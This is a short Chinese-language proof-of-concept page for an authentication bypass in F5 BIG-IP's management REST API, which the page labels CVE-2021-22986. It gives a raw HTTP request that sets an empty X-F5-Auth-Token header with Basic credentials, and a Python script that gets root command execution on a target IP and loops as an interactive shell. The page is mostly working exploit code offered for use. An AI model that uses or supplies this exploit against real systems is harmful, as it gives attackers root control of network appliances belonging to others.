原理

在同时设置HTTP基础认证与X-F5-Auth-Token头且值为空时，会绕过程序对身份的验证，通过特定的接口即可进行远程命令执行。

影响范围

危害

可以获取root权限，并以root权限执行命令。

POC & EXP

手工

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token: 
Authorization: Basic YWRtaW46
Content-Length: 52

{
    "command": "run",
    "utilCmdArgs": "-c id"
}

脚本

import requests
import json
import sys
requests.packages.urllib3.disable_warnings()
proxies = {'http': 'http://localhost:7890', 'https': 'http://localhost:7890'}

# BIG IP CVE-2021-22986
def POC(ip, cmd):
    url = "https://" + ip + "/mgmt/tm/util/bash"
    headers = {
        "Authorization": "Basic YWRtaW46QVNhc1M=",
        "X-F5-Auth-Token": "",
        "Content-Type": "application/json"
    }
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        text = requests.post(url=url, json=data, headers=headers, verify=False, timeout=20, proxies=proxies)
        if text.status_code == 200 and 'commandResult' in text.text:
            source = json.loads(text.text)
            print(source['commandResult'])
            return True
        else:
            print("Code: " + str(text.status_code))
            return False
    except Exception as e:
        print("Error")
        return False


if __name__ == "__main__":
    ip = sys.argv[1]
    if POC(ip, "whoami"):
        while 1:
            POC(ip, input("Command: "))
    else:
        print("commandResult not Found.")